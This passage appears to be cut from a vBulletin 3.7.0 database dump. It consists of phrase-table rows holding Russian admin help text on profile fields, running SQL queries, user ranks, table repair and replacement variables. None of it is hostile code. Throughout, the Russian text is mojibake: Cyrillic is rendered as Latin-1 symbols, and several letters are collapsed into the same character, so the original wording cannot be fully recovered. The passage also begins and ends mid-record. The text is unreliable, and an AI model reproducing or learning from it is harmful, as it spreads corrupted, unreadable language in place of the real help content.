\r\n\r\nÊîëîíêà \"Ãîðÿäîê îòîáðàæåíèÿ\" ñîäåðæèò â ñåáå ïîðÿäîê îòîáðàæåíèÿ ñîîòâåòñòâóþùåãî ïîëÿ ïðîôèëÿ. Ãîðÿäêè îòîáðàæåíèÿ èñïîëüçóþòñÿ äëÿ ñîðòèðîâêè ïîëåé ïðîôèëÿ íà ðàçíîîáðàçíûõ ñòðàíèöàõ êàáèíåòà. Âû ìîæåòå èçìåíèòü ïîðÿäîê îòîáðàæåíèÿ, ðåäàêòèðóÿ çíà÷åíèÿ ñîîòâåòñòâóþùèõ ïîëåé è íàæàâ íà êíîïêó \"Ñîõðàíèòü ïîðÿäîê îòîáðàæåíèÿ\".

', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (23767, -1, 'profilefield_modify_title', 'cphelptext', 'Óïðàâëåíèå äîïîëíèòåëüíûìè ïîëÿìè ïðîôèëÿ ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (23768, -1, 'profilefield_remove_text', 'cphelptext', 'Ãòî ïîäòâåðæäåíèå òîãî, ÷òî âû æåëàåòå óäàëèòü ýòî ïîëå ïðîôèëÿ. Óäàëèâ ïîëå ïðîôèëÿ, âû ïîòåðÿåòå âñþ èíôîðìàöèþ â ýòîì ïîëå. Ãàæìèòå êíîïêó \"Äà\" äëÿ óäàëåíèÿ. Âîññòàíîâëåíèå íåâîçìîæíî.', 'vbulletin', '', 0, ''), (23769, -1, 'profilefield_remove_title', 'cphelptext', 'Óäàëèòü ïîëå ïðîôèëÿ', 'vbulletin', '', 0, ''), (23770, -1, 'queries_text', 'cphelptext', 'Ñïðàâî÷íûå ñòàòüè:
\r\nÃåçåðâíîå êîïèðîâàíèå áàçû äàííûõ
\r\nÂîññòàíîâëåíèå/îïòèìèçàöèÿ
\r\nÎáíîâëåíèå ñ÷¸ò÷èêîâ
\r\nÄèàãíîñòèêà
\r\nÂûïîëíåíèå SQL çàïðîñà

\r\n\r\nÂûïîëíåíèå SQL çàïðîñà:
\r\nÃà ýòîé ñòðàíèöå âû ìîæåòå âûïîëíèòü çàïðîñû ê âàøåé áàçå äàííûõ ôîðóìà. Ãòî ìîæåò áûòü ïîëåçíî äëÿ ìàññîâîãî îáíîâëåíèÿ çàïèñåé â âàøåé áàçå äàííûõ. Âàì ñëåäóåò âñåãäà äåëàòü ðåçåðâíîå êîïèðîâàíèå áàçû äàííûõ äî âûïîëíåíèÿ çàïðîñà ê íåé. Ëþáîé ïðàâèëüíûé çàïðîñ MySQL ìîæåò áûòü âûïîëíåí çäåñü. Ñì. mysql.com äëÿ ïîëó÷åíèÿ áîëåå ïîäðîáíîé èíôîðìàöèè îá ýòîì.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (23771, -1, 'queries_title', 'cphelptext', 'ÃŽ âûïîëíåíèè SQL çàïðîñà', 'vbulletin', '', 0, ''), (23772, -1, 'queries_modify_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò âàì âûïîëíÿòü çàïðîñû ê âàøåé áàçå äàííûõ. Âàì ñëåäóåò ñäåëàòü ðåçåðâíîå êîïèðîâàíèå áàçû äàííûõ äî âûïîëíåíèÿ çàïðîñà ê íåé.', 'vbulletin', '', 0, ''), (23773, -1, 'queries_modify_title', 'cphelptext', 'Âûïîëíèòü SQL çàïðîñ', 'vbulletin', '', 0, ''), (23774, -1, 'queries_modify_autoquery_text', 'cphelptext', 'Ãòî ïðåäóñòàíîâëåííûå çàïðîñû äëÿ óïðàâëåíèÿ íàñòðîéêàìè ïîëüçîâàòåëåé. Âûáåðèòå çàïðîñ, êîòîðûé âû æåëàåòå çàïóñòèòü, è íàæìèòå êíîïêó \"Ãðîäîëæèòü\", ÷òîáû âûïîëíèòü åãî.', 'vbulletin', '', 0, ''), (23775, -1, 'queries_modify_autoquery_title', 'cphelptext', 'Àâòîìàòè÷åñêèé çàïðîñ', 'vbulletin', '', 0, ''), (23776, -1, 'queries_modify_query_text', 'cphelptext', 'Çäåñü âû ìîæåòå ñàìîñòîÿòåëüíî ââåñòè çàïðîñ äëÿ çàïóñêà. Òîëüêî îäèí çàïðîñ ìîæåò áûòü âûïîëíåí çà ðàç. Ãîñëå âûïîëíåíèÿ çàïðîñà âîññòàíîâëåíèå íåâîçìîæíî.', 'vbulletin', '', 0, ''), (23777, -1, 'queries_modify_query_title', 'cphelptext', 'Ãó÷íîé çàïðîñ', 'vbulletin', '', 0, ''), (23778, -1, 'queries_modify_perpage_text', 'cphelptext', 'Çàïðîñû âîçâðàùàþò ðåçóëüòàòû ïîñëå âûïîëíåíèÿ. Çäåñü âû ìîæåòå óêàçàòü ñêîëüêî ðåçóëüòàòîâ áóäåò âûâîäèòüñÿ íà îäíîé ñòðàíèöå.', 'vbulletin', '', 0, ''), (23779, -1, 'queries_modify_perpage_title', 'cphelptext', 'Ãåçóëüòàòîâ íà ñòðàíèöó', 'vbulletin', '', 0, ''), (23780, -1, 'ranks_text', 'cphelptext', 'Çâàíèÿ ïîëüçîâàòåëåé:
\r\nÇâàíèÿ ïîëüçîâàòåëåé - çâàíèÿ, ñ ðàçëè÷èÿìè, îñíîâàííûìè íà êîëè÷åñòâå ñîîáùåíèé è ãðóïïå ïîëüçîâàòåëåé, îòîáðàæàåìûå âîçëå èì¸í ïîëüçîâàòåëåé â ñîîáùåíèÿõ. Çâàíèÿ ïîëüçîâàòåëåé ðàáîòàþò î÷åíü ñõîäíî ñî ñòàòóñàìè ïîëüçîâàòåëåé. Èõ ãëàâíîå îòëè÷èå ñîñòîèò â òîì, ÷òî ñòàòóñû ïîëüçîâàòåëåé äåéñòâóþò äëÿ âñåõ ãðóïï ïîëüçîâàòåëåé, à çâàíèÿ ìîãóò áûòü ñîçäàíû ñïåöèàëüíî äëÿ îòäåëüíûõ ãðóïï ïîëüçîâàòåëåé. Ãîýòîìó âû ìîæåòå ñäåëàòü ðàçëè÷íûå ïîêàçàòåëè äëÿ äîñòèæåíèÿ çâàíèÿ äëÿ ðàçíûõ ãðóïï ïîëüçîâàòåëåé. Çâàíèÿ ïîëüçîâàòåëåé îòîáðàæàþòñÿ ðÿäîì ñ èõ èìåíàìè â ñîîáùåíèÿõ.', 'vbulletin', '', 0, ''), (23781, -1, 'ranks_title', 'cphelptext', 'ÃŽ çâàíèÿõ ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (23782, -1, 'ranks_add_text', 'cphelptext', 'Çäåñü âû ìîæåòå äîáàâèòü íîâîå çâàíèå ïîëüçîâàòåëåé. Ñìîòðèòå ñïðàâî÷íûå ñòàòüè íèæå, åñëè ó âàñ åñòü âîïðîñû íà ýòó òåìó.', 'vbulletin', '', 0, ''), (23783, -1, 'ranks_add_title', 'cphelptext', 'Äîáàâèòü íîâîå ïîëüçîâàòåëüñêîå çâàíèå', 'vbulletin', '', 0, ''), (23784, -1, 'ranks_add_edit_ranklevel_text', 'cphelptext', 'Ãòî êîëè÷åñòâî ðàç, êîãäà áóäåò ïîâòîðÿòüñÿ èçîáðàæåíèå èëè òåêñò çâàíèÿ ïðè îòîáðàæåíèè ó èìåíè ïîëüçîâàòåëÿ â ñîîáùåíèÿõ.

\r\n\r\nÃàïðèìåð, âû óêàçàëè òåêñò çâàíèÿ \"Êàïèòàí \" è óñòàíîâèëè çäåñü 2, òî çâàíèå ïîëüçîâàòåëÿ áóäåò îòîáðàæàòüñÿ êàê \"Êàïèòàí Êàïèòàí \".', 'vbulletin', '', 0, ''), (23785, -1, 'ranks_add_edit_ranklevel_title', 'cphelptext', 'Êîëè÷åñòâî ïîâòîðåíèé çâàíèÿ', 'vbulletin', '', 0, ''), (23786, -1, 'ranks_add_edit_minposts_text', 'cphelptext', 'Ãòî ìèíèìàëüíîå êîëè÷åñòâî ñîîáùåíèé, òðåáóåìîå äëÿ òîãî, ÷òîáû ïîëüçîâàòåëþ áûë ïðèñâîåíî ýòî çâàíèå. Êîãäà ïîëüçîâàòåëü èç óêàçàííîé ãðóïïû ïîëüçîâàòåëåé íàáèðàåò íåîáõîäèìîå ÷èñëî ñîîáùåíèé, îí ïîëó÷àåò ýòî çâàíèå.', 'vbulletin', '', 0, ''), (23787, -1, 'ranks_add_edit_minposts_title', 'cphelptext', 'Ìèíèìàëüíîå ÷èñëî ñîîáùåíèé', 'vbulletin', '', 0, ''), (23788, -1, 'ranks_add_edit_usergroupid_text', 'cphelptext', 'Ãòî ãðóïïà ïîëüçîâàòåëåé, ê êîòîðîé ïðèìåíèìî äàííîå çâàíèå. Ãîëüçîâàòåëè, ê êîòîðûì îíî áóäåò ïðèìåíèìî, çàâèñÿò îò ïàðàìåòðà \"Òèï îòîáðàæåíèÿ\". Åñëè âû âûáåðèòå \"Âñåãäà\", òî âñå ïîëüçîâàòåëè ýòîé ãðóïïû â åãî ãëàâíîé èëè äîïîëíèòåëüíûõ ãðóïïàõ áóäóò ïîëó÷àòü ýòî çâàíèå. Åñëè âû âûáåðèòå \"Åñëè îòîáðàæàåìàÿ ãðóïïà = Ãòà ãðóïïà\", òî òîëüêî ïîëüçîâàòåëè, êîòîðûå îïðåäåëÿþò ñåáÿ ÷ëåíàìè äàííîé ãðóïïû ïîëüçîâàòåëåé, áóäóò ïîëó÷àòü ýòî çâàíèå.
\r\n
\r\nÂûáåðèòå \"Âñå ãðóïïû ïîëüçîâàòåëåé\", ÷òîáû ïðèñâàèâàòü äàííîå çâàíèå âñåì ïîëüçîâàòåëÿì âíå çàâèñèìîñòè îò èõ ãðóïïû.', 'vbulletin', '', 0, ''), (23789, -1, 'ranks_add_edit_usergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (23790, -1, 'ranks_add_edit_rankimg_text', 'cphelptext', 'Ââåäèòå ïóòü ê ôàéëó ñ èçîáðàæåíèåì äëÿ ýòîãî çâàíèÿ. Ãòîò ïóòü äîëæåí áûòü îòíîñèòåëüíûì âàøåé ãëàâíîé äèðåêòîðèè. Ãàïðèìåð, åñëè èçîáðàæåíèå äëÿ âàøåãî çâàíèÿ íàçûâàåòñÿ zvaine.gif, è âû çàãðóçèëè å¸ â äèðåêòîðèþ images, íàõîäÿùóþñÿ â âàøåé äèðåêòîðèè ôîðóìà, òî âàì ñëåäóåò ââåñòè: images/zvanie.gif

\r\n\r\nÊàê àëüòåðíàòèâó, âû ìîæåòå ïðîïóñòèòü ýòî ïîëå è çàïîëíèòü ñëåäóþùåå, ñ òåêñòîì çâàíèÿ.', 'vbulletin', '', 0, ''), (23791, -1, 'ranks_add_edit_rankimg_title', 'cphelptext', 'Ãóòü ê ôàéëó ñî çâàíèåì ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (23792, -1, 'ranks_add_edit_rankhtml_text', 'cphelptext', 'Åñëè âû æåëàåòå âìåñòî èçîáðàæåíèÿ îòîáðàæàòü òåêñò äëÿ ýòîãî çâàíèÿ, òî ïðîïóñòèòå ïðåäûäóùåå ïîëå è çàïîëíèòå ýòî ïîëå. Çäåñü âû ìîæåòå èñïîëüçîâàòü HTML êîä.

\r\n\r\nÂîò íåêîòîðûå HTML òåãè, êîòîðûå âû, âåðîÿòíî, ïîæåëàåòå âêëþ÷èòü:

\r\n\r\n<b>çâàíèå</b> = çâàíèå
\r\n<i>çâàíèå</i> = çâàíèå
\r\n<u>çâàíèå</u> = çâàíèå
\r\n<font color=\"red\">çâàíèå</font> = çâàíèå
\r\n<font size=\"4\">çâàíèå</font> = çâàíèå', 'vbulletin', 'zCarot', 1205431156, '3.7.0 Release Candidate 1'), (23793, -1, 'ranks_add_edit_rankhtml_title', 'cphelptext', 'Òåêñò çâàíèÿ', 'vbulletin', '', 0, ''), (23794, -1, 'ranks_add_edit_stack_text', 'cphelptext', 'Åñëè \"Äà\", òî îíî áóäåò íàõîäèòüñÿ íà îòäåëüíîé ñòðîêå ïî ñðàâíåíèþ ñ äðóãèìè çâàíèÿìè.  ïðîòèâíîì ñëó÷àå îíî áóäåò ñëåâà îò äðóãèõ çâàíèé.  ïðàâèëàõ HTML ýòà îïöèÿ îïðåäåëÿåò, áóäåò èëè íåò âñòàâëåí ïåðåä ýòèì çâàíèåì òåã <br />.', 'vbulletin', 'zCarot', 1205942440, '3.7.0 Release Candidate 1'), (23795, -1, 'ranks_add_edit_stack_title', 'cphelptext', 'Ãåðåíåñòè çâàíèå', 'vbulletin', '', 0, ''), (23796, -1, 'ranks_add_edit_display_text', 'cphelptext', 'Âñåãäà: ýòî çâàíèå áóäåò îòîáðàæàòüñÿ, åñëè ó÷àñòíèê ÿâëÿåòñÿ ÷ëåíîì óêàçàííîé ãðóïïû ïîëüçîâàòåëåé.

\r\nÅñëè îòîáðàæàòü ãðóïïó, òî ýòó ãðóïïó: ýòî çâàíèå áóäåò îòîáðàæàòüñÿ, åñëè îòîáðàæàåìàÿ ãðóïïà ïîëüçîâàòåëÿ ÿâëÿåòñÿ ãðóïïîé ïîëüçîâàòåëåé, èñïîëüçóþùèõ ýòî çâàíèå.', 'vbulletin', '', 0, ''), (23797, -1, 'ranks_add_edit_display_title', 'cphelptext', 'Òèï îòîáðàæåíèÿ', 'vbulletin', '', 0, ''), (23798, -1, 'ranks_edit_text', 'cphelptext', 'Çäåñü âû ìîæåòå îòðåäàêòèðîâàòü çâàíèÿ ïîëüçîâàòåëåé. Ñìîòðèòå ñïðàâî÷íûå ñòàòüè íèæå, åñëè ó âàñ åñòü âîïðîñû íà ýòó òåìó', 'vbulletin', '', 0, ''), (23799, -1, 'ranks_edit_title', 'cphelptext', 'Ãåäàêòèðîâàíèå çâàíèé ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (23800, -1, 'ranks_modify_text', 'cphelptext', 'Ãòî óïðàâëåíèå çâàíèÿìè ïîëüçîâàòåëåé. Çäåñü âû ìîæåòå óïðàâëÿòü çâàíèÿìè, îñíîâàííûìè íà ñ÷¸ò÷èêå ñîîáùåíèé äëÿ îäíîé èëè âñåõ ãðóïï ïîëüçîâàòåëåé. Çâàíèÿìè ìîãóò ñëóæèòü êàê èçîáðàæåíèÿ, òàê è òåêñò (HTML äîïóñêàåòñÿ).

\r\n\r\nÃèæå íàõîäèòñÿ ñïèñîê âñåõ âàøèõ äîïóñòèìûõ çâàíèé (åñëè åñòü). Çâàíèÿ ðàñïðåäåëåíû ïî ãðóïïàì ïîëüçîâàòåëåé, ê êîòîðûì îíè ïðèìåíèìû. Êîëîíêà \"Çâàíèå ïîëüçîâàòåëåé\" îòîáðàæàåò èçîáðàæåíèå èëè òåêñò, êîòîðûå îçíà÷àþò, ÷òî ïîëüçîâàòåëü ïîëó÷èë ñîîòâåòñòâóþùèé çâàíèå. Êîëîíêà \"ìèíèìàëüíîå ÷èñëî ñîîáùåíèé\" óêàçûâàåò íà êîëè÷åñòâî ñîîáùåíèé, íåîáõîäèìîå äëÿ ïîëó÷åíèÿ ñîîòâåòñòâóþùåãî çâàíèÿ.

\r\n\r\nÃàæìèòå íà ññûëêó \"Ãåäàêòèðîâàòü\" ñïðàâà îò çâàíèÿ, ÷òîáû èçìåíèòü ãðóïïó ïîëüçîâàòåëåé, ìèíèìàëüíîå ÷èñëî ñîîáùåíèé è èçîáðàæåíèå/òåêñò çâàíèÿ. Ãàæìèòå íà ññûëêó \"Óäàëèòü\", ÷òîáû ïîëíîñòüþ óäàëèòü çâàíèå.', 'vbulletin', '', 0, ''), (23801, -1, 'ranks_modify_title', 'cphelptext', 'Óïðàâëåíèå çâàíèÿìè ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (23802, -1, 'ranks_remove_text', 'cphelptext', 'Ãòî ïîäòâåðæäåíèå òîãî, ÷òî âû æåëàåòå óäàëèòü ýòî çâàíèå. Ãàæìèòå íà êíîïêó \"Äà\", ÷òîáû óäàëèòü åãî.', 'vbulletin', '', 0, ''), (23803, -1, 'ranks_remove_title', 'cphelptext', 'Óäàëåíèå çâàíèÿ', 'vbulletin', '', 0, ''), (23804, -1, 'repair_text', 'cphelptext', 'Ñïðàâî÷íûå ñòàòüè:
\r\nÃåçåðâíîå êîïèðîâàíèå áàçû äàííûõ
\r\nÂîññòàíîâëåíèå/îïòèìèçàöèÿ
\r\nÎáíîâëåíèå ñ÷¸ò÷èêîâ
\r\nÄèàãíîñòèêà
\r\nÂûïîëíåíèå SQL çàïðîñà

\r\n\r\nÂîññòàíîâëåíèå/îïòèìèçàöèÿ:
\r\nÃòîò ñêðèïò ìîæåò áûòü èñïîëüçîâàí äëÿ âîññòàíîâëåíèÿ/îïòèìèçàöèè âàøåé áàçû äàííûõ. Åñëè âàøè îøèáêè áàçû äàííûõ âûçâàíû ïîâðåæäåíèåì òàáëèö, òî ýòîò ñêðèïò, âîçìîæíî, èñïðàâèò èõ. Êàê àëüòåðíàòèâó, âû ìîæåòå èñïîëüçîâàòü äëÿ âîññòàíîâëåíèÿ âàøåé áàçû äàííûõ âûïîëíåíèå çàïðîñà REPAIR TABLE â êîìàíäíîé ñòðîêå mysql ÷åðåç telnet / SSH ñîåäèíåíèå ê âàøåìó ñåðâåðó (åñëè ó âàñ åñòü äîñòóï).

\r\n\r\nÂû ìîæåòå òàêæå èñïîëüçîâàòü ýòîò ñêðèïò äëÿ îïòèìèçàöèè âàøèõ òàáëèö. Ñëåäóåò îïòèìèçèðîâàòü òàáëèöû â òîì ñëó÷àå, åñëè âû íåäàâíî óäàëèëè áîëüøîå êîëè÷åñòâî òåì, ñîîáùåíèé, ïîëüçîâàòåëåé è ò.ä.. Îïòèìèçàöèÿ ïîìîæåò âàì âîññòàíîâèòü íåèñïîëüçóåìîå ìåñòî, êîòîðîå ìîæåò óâåëè÷èâàòü ðàçìåð âàøåé áàçû äàííûõ.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (23805, -1, 'repair_title', 'cphelptext', 'Î âîññòàíîâëåíèè/îïòèìèçàöèè', 'vbulletin', '', 0, ''), (23806, -1, 'repair_list_text', 'cphelptext', 'Âûáåðèòå òàáëèöû, à çàòåì íåîáõîäèìîå äåéñòâèå. Âîññòàíîâèòå òàáëèöû, åñëè îíè áûëè ïîâðåæäåíû, èëè îïòèìèçèðóéòå äëÿ ïîâûøåíèÿ áûñòðîäåéñòâèÿ.', 'vbulletin', '', 0, ''), (23807, -1, 'repair_list_title', 'cphelptext', 'Âîññòàíîâèòü/îïòèìèçèðîâàòü òàáëèöû', 'vbulletin', '', 0, ''), (23808, -1, 'repair_list_optimizetables_text', 'cphelptext', 'Åñëè âû óäàëèëè çíà÷èòåëüíóþ ÷àñòü òàáëèö èëè ñäåëàëè ìíîãî èçìåíåíèé ñ òàáëèöàìè ñ äëèíîé êîëîíêè, çàâèñèìîé îò ïåðåìåííîé (òàáëèöû, êîòîðûå èìåþò êîëîíêè VARCHAR, BLOB èëè TEXT), òî âàì ñëåäóåò îïòèìèçèðîâàòü âàøó áàçó äàííûõ. Îïòèìèçàöèÿ ïîìîæåò âàì âîññòàíîâèòü íåèñïîëüçóåìîå ìåñòî, êîòîðîå ìîæåò óâåëè÷èâàòü ðàçìåð âàøåé áàçû äàííûõ.', 'vbulletin', '', 0, ''), (23809, -1, 'repair_list_optimizetables_title', 'cphelptext', 'Îïòèìèçèðîâàòü òàáëèöû', 'vbulletin', '', 0, ''), (23810, -1, 'repair_list_repairtables_text', 'cphelptext', 'Âîññòàíîâëåíèå âûáðàííûõ òàáëèö, åñëè òàì íàéäåíû îøèáêè.', 'vbulletin', '', 0, ''), (23811, -1, 'repair_list_repairtables_title', 'cphelptext', 'Âîññòàíîâèòü òàáëèöû', 'vbulletin', '', 0, ''), (23812, -1, 'replacement_text', 'cphelptext', 'Ñïðàâî÷íûå ñòàòüè:
\r\nÑòèëè è øàáëîíû
\r\nÎáùèå øàáëîíû, ïåðåìåííûå ñòèëÿ è CSS
\r\nÇàìåùàåìûå ïåðåìåííûå

\r\n\r\nÇàìåùàåìûå ïåðåìåííûå:
\r\nÇàìåùàåìûå ïåðåìåííûå - îäíîñòðî÷íûå çàìåíû äëÿ âàøèõ øàáëîíîâ, êîòîðûå íå çàâèñÿò îò ðåãèñòðà.

\r\n\r\nÃàïðèìåð, åñëè âû ñîçäàëè çàìåùàåìóþ ïåðåìåííóþ, èñïîëüçóþùóþ ñòðîêó \"ôîðóì\" è ñòðîêó äëÿ çàìåíû \"ñàéò\", òî òîãäà ýòà ñòðîêà øàáëîíà áóäåò çàìåíåíà â ñîîòâåòñòâóþùèå ñòðîêè ïðè çàãðóçêè ôîðóìà:

\r\n\r\nÑòðîêà øàáëîíà: Îñíîâà äëÿ ôîðóìà: ôîðóì
\r\nÑòðîêà çàìåíû: Îñíîâà äëÿ ñàéòà: ñàéò

\r\n\r\nÑòðîêà øàáëîíà: ôîÃÓì3
\r\nÑòðîêà çàìåíû: ñàéò3

\r\n\r\nÂû ìîæåòå èñïîëüçîâàòü çàìåùàåìûå ïåðåìåííûå òàê æå, êàê è ôîðóì èñïîëüçóåò ïåðåìåííûå ñòèëÿ (ñì. ññûëêó \"Îáùèå øàáëîíû, ïåðåìåííûå ñòèëÿ è CSS\"). Åñëè âû èñïîëüçóéòå îäèíàêîâûå ñòðîêè â íåñêîëüêèõ øàáëîíàõ, òî âû ìîæåòå ñîçäàòü çàìåùàåìûå ïåðåìåííûå äëÿ êàæäîãî. Âû ìîæåòå èñïîëüçîâàòü çàìåùàåìûå ïåðåìåííûå â øàáëîíàõ è óêàçàòü èõ çíà÷åíèÿ â óïðàâëåíèè çàìåùàåìûìè ïåðåìåííûìè. Åñëè âû æåëàåòå èçìåíèòü çíà÷åíèå ñòðîêè, òî âàì ñëåäóåò èçìåíèòü çàìåùàåìóþ ïåðåìåííóþ, êîòîðàÿ èçìåíèò ñâîå çíà÷åíèå âî âñåõ øàáëîíàõ, ãäå îíà èñïîëüçóåòñÿ.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (23813, -1, 'replacement_title', 'cphelptext', 'ÃŽ çàìåùàåìûõ ïåðåìåííûõ', 'vbulletin', '', 0, ''), (23814, -1, 'replacement_add_text', 'cphelptext', 'Çäåñü âû ìîæåòå äîáàâèòü íîâóþ çàìåùàåìóþ ïåðåìåííóþ. Çàìåùàåìûå ïåðåìåííûå ïîëåçíû äëÿ äðóãîãî ïðåäñòàâëåíèÿ îáû÷íûõ çíà÷åíèé ïåðåìåííûõ â øàáëîíàõ. Ãàïðèìåð, ïóòü ê äèðåêòîðèè images èñïîëüçóåòñÿ âî ìíîãèõ øàáëîíàõ ôîðóìà, è îí òîæå ÿâëÿåòñÿ çàìåùàåìîé ïåðåìåííîé. Çàìåùàåìàÿ ïåðåìåííàÿ ñ äèðåêòîðèåé images ìîæåò áûòü îòðåäàêòèðîâàíà äëÿ èçìåíåíèÿ ïóòè ê images â êàæäîì øàáëîíå.

\r\n\r\nÄëÿ íà÷àëà âàì íóæíî âûáðàòü ñòèëü, ê êîòîðîìó áóäåò ïðèìåíåíà ýòà çàìåùàåìàÿ ïåðåìåííàÿ. Ãîëå \"Òåêñò äëÿ ïîèñêà\" ñîäåðæèò ïåðåìåííóþ, èñïîëüçóåìóþ â øàáëîíàõ. Ãîëå \"Çàìåíèòü òåêñòîì\" ñîäåðæèò çíà÷åíèå, êîòîðîå áóäåò ïîâñþäó çàìåíÿòü çàìåùàåìóþ ïåðåìåííóþ.', 'vbulletin', '', 0, ''), (23815, -1, 'replacement_add_title', 'cphelptext', 'Äîáàâèòü íîâóþ çàìåùàåìóþ ïåðåìåííóþ', 'vbulletin', '', 0, ''), (23816, -1, 'replacement_add_dostyleid_text', 'cphelptext', 'Âûáåðèòå ñòèëü, ê êîòîðîìó äîëæíà ïðèíàäëåæàòü ýòà çàìåùàåìàÿ ïåðåìåííàÿ.', 'vbulletin', '', 0, ''), (23817, -1, 'replacement_add_dostyleid_title', 'cphelptext', 'Ñòèëü', 'vbulletin', '', 0, ''), (23818, -1, 'replacement_add_edit_findtext_text', 'cphelptext', 'Ãòî ïîëå äëÿ ïåðåìåííîé, èñïîëüçóåìîé â øàáëîíàõ. Çíà÷åíèå ïîëÿ \"Çàìåíèòü òåêñòîì\" áóäåò çàìåíÿòü çíà÷åíèå ýòîãî ïîëÿ ïîâñþäó, ãäå îíî èñïîëüçóåòñÿ.', 'vbulletin', '', 0, ''), (23819, -1, 'replacement_add_edit_findtext_title', 'cphelptext', 'Ãîèñê òåêñòà', 'vbulletin', '', 0, ''), (23820, -1, 'replacement_add_edit_replacetext_text', 'cphelptext', 'Ãòî ïîëå ñîäåðæèò çíà÷åíèå, êîòîðîå áóäåò ïîâñþäó çàìåíÿòü çàìåùàåìóþ ïåðåìåííóþ.', 'vbulletin', '', 0, ''), (23821, -1, 'replacement_add_edit_replacetext_title', 'cphelptext', 'Çàìåíà òåêñòîì', 'vbulletin', '', 0, ''), (23822, -1, 'replacement_edit_text', 'cphelptext', 'Çäåñü âû ìîæåòå îòðåäàêòèðîâàòü ýòó çàìåùàåìóþ ïåðåìåííóþ. Çàìåùàåìûå ïåðåìåííûå ïîëåçíû äëÿ äðóãîãî ïðåäñòàâëåíèÿ îáû÷íûõ çíà÷åíèé ïåðåìåííûõ â øàáëîíàõ. Ãàïðèìåð, ïóòü ê äèðåêòîðèè images èñïîëüçóåòñÿ âî ìíîãèõ øàáëîíàõ ôîðóìà è îí òîæå ÿâëÿåòñÿ çàìåùàåìîé ïåðåìåííîé. Çàìåùàåìàÿ ïåðåìåííàÿ ñ äèðåêòîðèåé images ìîæåò áûòü îòðåäàêòèðîâàíà äëÿ èçìåíåíèÿ ïóòè ê images â êàæäîì øàáëîíå.

\r\n\r\nÃîëå \"Òåêñò äëÿ ïîèñêà\" ñîäåðæèò ïåðåìåííóþ, èñïîëüçóåìóþ â øàáëîíàõ. Ãîëå \"Çàìåíèòü òåêñòîì\" ñîäåðæèò çíà÷åíèå, êîòîðîå áóäåò ïîâñþäó çàìåíÿòü çàìåùàåìóþ ïåðåìåííóþ.', 'vbulletin', '', 0, ''), (23823, -1, 'replacement_edit_title', 'cphelptext', 'Ãåäàêòèðîâàíèå çàìåùàåìîé ïåðåìåííîé', 'vbulletin', '', 0, ''), (23824, -1, 'replacement_modify_text', 'cphelptext', 'Ãòà ñòðàíèöà îòîáðàæàåò âñå âàøè çàìåùàåìûå ïåðåìåííûå äëÿ âñåõ ñòèëåé. Çàìåùàåìûå ïåðåìåííûå ìîãóò áûòü èñïîëüçîâàíû â øàáëîíàõ. Ãðè çàãðóçêå ñòðàíèöû ôîðóìà âñå çàìåùàåìûå ïåðåìåííûå â øàáëîíàõ çàìåíÿþòñÿ çàìåùàåìûìè èõ çíà÷åíèÿìè.', 'vbulletin', '', 0, ''), (23825, -1, 'replacement_modify_title', 'cphelptext', 'Óïðàâëåíèå çàìåùàåìûìè ïåðåìåííûìè', 'vbulletin', '', 0, ''), (23826, -1, 'replacement_remove_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì óäàëèòü ýòó çàìåùàåìóþ ïåðåìåííóþ. Ãàæìèòå êíîïêó \"Äà\" äëÿ óäàëåíèÿ. Åñëè ñòèëü èìååò ïîäñòèëè, òî îíè òàêæå ïîòåðÿþò äîñòóï ê ýòîé çàìåùàåìîé ïåðåìåííîé, åñëè îíà áóäåò óäàëåíà. Âîññòàíîâëåíèå íåâîçìîæíî!', 'vbulletin', '', 0, ''), (23827, -1, 'replacement_remove_title', 'cphelptext', 'Óäàëåíèå çàìåùàåìîé ïåðåìåííîé', 'vbulletin', '', 0, ''), (23828, -1, 'resources_text', 'cphelptext', 'Ñïðàâî÷íûå ñòàòüè:
\r\nÃàçäåëû
\r\nÃðàâà â ðàçäåëàõ
\r\nÌîäåðàòîðû
\r\nÃðîñìîòð ïðàâ

\r\n\r\nÃðîñìîòð ïðàâ:
\r\nÑèñòåìà ïðàâ ôîðóìà î÷åíü ìîùíàÿ è ãèáêàÿ, íî îíà ìîæåò ïîêàçàòüñÿ î÷åíü ñëîæíîé äëÿ íåîïûòíûõ ñ ôîðóìîì. Èíîãäà ñëîæíî ïîíÿòü, íàñòðîåíû ëè ïðàâà ïðàâèëüíî. Ãòà ñòðàíèöà ïîçâîëÿåò âàì ïîäòâåðäèòü, ÷òî ïðàâà óñòàíîâëåíû ïðàâèëüíî äëÿ âñåõ ãðóïï ïîëüçîâàòåëåé â êàæäîì ðàçäåëå.

\r\n\r\nÄëÿ äåòàëüíîãî îáúÿñíåíèÿ ãðóïï ïîëüçîâàòåëåé è ïðàâ ðàçäåëîâ ñìîòðèòå ñïðàâî÷íûå ñòàòüè íà òåìó \"Ãðóïïû ïîëüçîâàòåëåé\".', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (23829, -1, 'resources_title', 'cphelptext', 'ÃŽ ïðîñìîòðå ïðàâ', 'vbulletin', '', 0, ''), (23830, -1, 'resources_index_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì ïðîñìîòðåòü ïðàâà îïðåäåëåííîãî ðàçäåëà äëÿ ãðóïïû ïîëüçîâàòåëåé. Ãòî ìîæåò áûòü ïîëåçíûì äëÿ ïîäòâåðæäåíèÿ ïðàâèëüíîñòè ïðàâ ïðè íàñëåäîâàíèè è äðóãèõ ñëîæíîñòÿõ.

